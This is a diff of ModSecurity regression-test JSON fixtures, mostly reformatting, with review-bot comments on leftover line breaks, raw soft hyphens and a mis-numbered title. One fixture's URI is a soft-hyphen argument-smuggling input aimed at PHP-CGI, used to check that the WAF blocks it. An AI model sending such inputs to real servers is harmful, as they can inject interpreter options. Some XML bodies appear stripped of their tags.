\\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ 
@@ -345,24 +373,34 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1=test¶m2=%20tEst2", + "uri": "/test.pl?param1=test¶m2=%20tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ 
@@ -394,24 +432,34 @@
 "request": {
 "headers": {
 "Host": "www.modsecurity.org",
- "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)",
- "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8",
+ "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
 "Accept-Language": "en-us,en;q=0.5",
 "Accept-Encoding": "gzip,deflate",
 "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
 "Keep-Alive": "300",
 "Connection": "keep-alive",
 "Pragma": "no-cache",
- "Cache-Control": "no-cache"
+ "Cache-Control": "no-cache",
+ "Content-Length": "0"
 },
- "uri": "\/test.pl?param1=test¶m2=tEst2",
+ "uri": "/test.pl?param1=test¶m2=tEst2",
 "method": "GET",
 "http_version": 1.1,
- "body": ""
+ "body": [
+ ""
+ ]
+ },
+ "response": {
+ "headers": {
+ "Content-Length": "0"
+ },
+ "body": [
+ ""
+ ]
 },
 "expected": {
 "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]",
- "error_log": "",
 "http_code": 403
 },
 "rules": [
@@ -444,24 +492,34 @@
 "request": {
 "headers": {
 "Host": "www.modsecurity.org",
- "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)",
- "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8",
+ "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
 "Accept-Language": "en-us,en;q=0.5",
 "Accept-Encoding": "gzip,deflate",
 "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
 "Keep-Alive": "300",
 "Connection": "keep-alive",
 "Pragma": "no-cache",
- "Cache-Control": "no-cache"
+ "Cache-Control": "no-cache",
+ "Content-Length": "0"
 },
- "uri": "\/test.pl?param1=test¶m2=%20tEst2",
+ "uri": "/test.pl?param1=test¶m2=%20tEst2",
 "method": "GET",
 "http_version": 1.1,
- "body": ""
+ "body": [
+ ""
+ ]
+ },
+ "response": {
+ "headers": {
+ "Content-Length": "0"
+ },
+ "body": [
+ ""
+ ]
 },
 "expected": {
 "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]",
- "error_log": "",
 "http_code": 403
 },
 "rules": [
@@ -494,24 +552,28 @@
 "request": {
 "headers": {
 "Host": "www.modsecurity.org",
- "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)",
- "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8",
+ "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
 "Accept-Language": "en-us,en;q=0.5",
 "Accept-Encoding": "gzip,deflate",
 "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
 "Keep-Alive": "300",
 "Connection": "keep-alive",
 "Pragma": "no-cache",
- "Cache-Control": "no-cache"
+ "Cache-Control": "no-cache",
+ "Content-Length": "0"
 },
- "uri": "\/test.pl?param1= test ¶m2=test2",
+ "uri": "/test.pl?param1= test ¶m2=test2",
 "method": "GET",
 "http_version": 1.1,
- "body": ""
+ "body": [
+ ""
+ ]
 },
 "response": {
 "headers": {
- "Content-Type": "plain\/text\n\r"
+ "Content-Type": "plain/text\n\r",
+ "Content-Length": "4"
 },
 "body": [
 "test"
@@ -519,8 +581,6 @@
 },
 "expected": {
 "audit_log": "\\[audit\\.log]:\\ ---.*\\[audit\\.log]:\\ Keep-Alive",
- "debug_log": "",
- "error_log": "",
 "http_code": 403
 },
 "rules": [
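Review bot: The response header value `"Content-Type": "plain/text\n\r"` in the `@@ -494,24 +552,28 @@` hunk still ends in a line feed followed by a carriage return, and it now sits next to a clean `"Content-Length": "4"`. The later files in this commit replace `"Content-Length":"length\n\r"` with a plain number but keep the same suffix on Content-Type, so it reads as a leftover rather than a deliberate malformed-header case. If it is not intentional, `"Content-Type": "plain/text",` keeps line-break characters out of the header value the rules see; if it is, the test title is the only place in a JSON fixture to say so. The same line recurs in the `@@ -553,24 +613,28 @@`, `@@ -622,27 +684,26 @@` and `@@ -685,19 +746,20 @@` hunks.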
@@ -553,24 +613,28 @@
 "request": {
 "headers": {
 "Host": "www.modsecurity.org",
- "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)",
- "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8",
+ "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
 "Accept-Language": "en-us,en;q=0.5",
 "Accept-Encoding": "gzip,deflate",
 "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
 "Keep-Alive": "300",
 "Connection": "keep-alive",
 "Pragma": "no-cache",
- "Cache-Control": "no-cache"
+ "Cache-Control": "no-cache",
+ "Content-Length": "0"
 },
- "uri": "\/?%ADd+allow%3d1+%ADd+auto",
+ "uri": "/?%ADd+allow%3d1+%ADd+auto",
 "method": "GET",
 "http_version": 1.1,
- "body": ""
+ "body": [
+ ""
+ ]
 },
 "response": {
 "headers": {
- "Content-Type": "plain\/text\n\r"
+ "Content-Type": "plain/text\n\r",
+ "Content-Length": "4"
 },
 "body": [
 "test"
@@ -578,8 +642,6 @@
 },
 "expected": {
 "audit_log": "\"match\":\"Matched \\\\\"Operator `ValidateUtf8Encoding' with parameter `' against variable `ARGS_NAMES:\\\\\\\\xadd allow=1 \\\\\\\\xadd auto' \\(Value: `\\\\\\\\xadd allow=1 \\\\\\\\xadd auto' \\)\"",
- "debug_log": "",
- "error_log": "",
 "http_code": 403
 },
 "rules": [
@@ -612,8 +674,8 @@
 "request": {
 "headers": {
 "Host": "www.modsecurity.org",
- "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)",
- "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8",
+ "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
 "Accept-Language": "en-us,en;q=0.5",
 "Accept-Encoding": "gzip,deflate",
 "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
@@ -622,27 +684,26 @@
 "Pragma": "no-cache",
 "Cache-Control": "no-cache",
 "Content-Type": "application/x-www-form-urlencoded",
- "Content-Length": "3"
+ "Content-Length": "5"
 },
- "uri": "\/?attack=true",
+ "uri": "/?attack=true",
 "method": "POST",
 "http_version": 1.1,
 "body": [
- "\u00ad=\u00ad"
+ "­=­"
 ]
 },
 "response": {
 "headers": {
- "Content-Type": "plain\/text\n\r"
+ "Content-Type": "plain/text\n\r",
+ "Content-Length": "4"
 },
 "body": [
 "test"
 ]
 },
 "expected": {
- "audit_log": "\"body\":\"\\\\\\\\xc2\\\\\\\\xad=\\\\\\\\xc2\\\\\\\\xad\\\\\\\\x0a",
- "debug_log": "",
- "error_log": "",
+ "audit_log": "\"body\":\"\\\\\\\\xc2\\\\\\\\xad=\\\\\\\\xc2\\\\\\\\xad",
 "http_code": 403
 },
 "rules": [
@@ -675,8 +736,8 @@
 "request": {
 "headers": {
 "Host": "www.modsecurity.org",
- "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)",
- "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8",
+ "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
 "Accept-Language": "en-us,en;q=0.5",
 "Accept-Encoding": "gzip,deflate",
 "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
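Review bot: The request body in the `@@ -622,27 +684,26 @@` hunk now holds two raw U+00AD soft hyphens where the old line spelled them out as `\u00ad`, so the bytes this test exists to exercise are typically not rendered in editors or diff views. The new `"Content-Length": "5"` and the `\\xc2\\xad` pattern in `audit_log` only hold while those characters survive as two-byte UTF-8 sequences; a tool that strips or normalises them would change the test with no visible diff. Keeping the escape, `"\u00ad=\u00ad"`, decodes to the same value and stays reviewable. The same applies to the header line `"X-\u00ad-custom": "Some \u00ad value"` and the body in the `@@ -685,19 +746,20 @@` hunk. The test objects these lines belong to start outside the hunks.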
@@ -685,19 +746,20 @@
 "Pragma": "no-cache",
 "Cache-Control": "no-cache",
 "Content-Type": "application/x-www-form-urlencoded",
- "Content-Length": "3",
- "X-\u00ad-custom": "Some \u00ad value"
+ "Content-Length": "5",
+ "X-­-custom": "Some ­ value"
 },
- "uri": "\/?attack=true",
+ "uri": "/?attack=true",
 "method": "POST",
 "http_version": 1.1,
 "body": [
- "\u00ad=\u00ad"
+ "­=­"
 ]
 },
 "response": {
 "headers": {
- "Content-Type": "plain\/text\n\r"
+ "Content-Type": "plain/text\n\r",
+ "Content-Length": "4"
 },
 "body": [
 "test"
@@ -705,8 +767,6 @@
 },
 "expected": {
 "audit_log": "\"X-\\\\\\\\xc2\\\\\\\\xad-custom\":\"Some \\\\\\\\xc2\\\\\\\\xad value\"",
- "debug_log": "",
- "error_log": "",
 "http_code": 403
 },
 "rules": [
diff --git a/test/test-cases/regression/collection-case-insensitive.json b/test/test-cases/regression/collection-case-insensitive.json
index 83c3a4d818..8db58efe94 100644
--- a/test/test-cases/regression/collection-case-insensitive.json
+++ b/test/test-cases/regression/collection-case-insensitive.json
@@ -1,57 +1,59 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: Case insensitive (1/1)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: Case insensitive (1/1)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + 
"body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"matched_var:PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"matched_var:PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_headers \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=matched_var:%{matched_var}%\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" diff --git a/test/test-cases/regression/collection-lua.json b/test/test-cases/regression/collection-lua.json index 8d8f4e129f..1c20b35f5a 100644 --- a/test/test-cases/regression/collection-lua.json +++ b/test/test-cases/regression/collection-lua.json 
@@ -1,292 +1,314 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set TX (1/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set TX (1/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: TX.lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: TX.lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:TX.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule TX.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, + }, { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set IP (2/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set IP (2/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": 
"localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: IP:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: IP:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:IP.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule IP.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, + }, { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set GLOBAL (3/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set GLOBAL (3/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." 
] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: GLOBAL:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: GLOBAL:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:GLOBAL.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule GLOBAL.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, + }, { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set RESOURCE (4/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set RESOURCE (4/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." 
] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: RESOURCE:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: RESOURCE:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:RESOURCE.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule RESOURCE.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set SESSION (5/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set SESSION (5/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." 
] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: SESSION:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: SESSION:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:SESSION.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule SESSION.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set USER (6/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set USER (6/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." 
] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: USER:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: USER:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:USER.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule USER.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.getvars ARGS (8/8)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.getvars ARGS (8/8)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?parm1=a&parm2=b", - "method":"GET", - "body": [ ] + "uri": "/whee?parm1=a&parm2=b", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match-getvars-args.lua \"id:2,phase:2,deny,status:403\"" ] - } + } ] diff --git a/test/test-cases/regression/collection-regular_expression_selection.json b/test/test-cases/regression/collection-regular_expression_selection.json index 5ac6db40a2..fb438399cf 100644 --- a/test/test-cases/regression/collection-regular_expression_selection.json +++ b/test/test-cases/regression/collection-regular_expression_selection.json 
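Review bot: The last test in this hunk is still titled `m.getvars ARGS (8/8)` while the six before it are numbered 1/7 to 6/7, so the re-added title line carries a count that matches neither the series nor the seven objects visible here. Since every title line is rewritten by this change anyway, `"title": "Testing LUA :: m.getvars ARGS (7/7)"` would keep failure reports unambiguous, provided nothing outside this file matches on the exact title string.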
@@ -1,58 +1,59 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX/regular expression (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX/regular expression (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?id_a=test&nah=nops", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?id_a=test&nah=nops", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ 
+ "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving variable: IP:nah with value: nops", - "error_log":"", - "http_code":200 + "expected": { + "debug_log": "Saving variable: IP:nah with value: nops", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:/^id_/ \"@contains test\" \"id:1,phase:2,t:lowercase,initcol:ip=%{REMOTE_ADDR}\"", "SecRule ARGS:/^id_/ \"@contains test\" \"id:2,phase:2,t:lowercase,setvar:IP.nah=nops\"", 
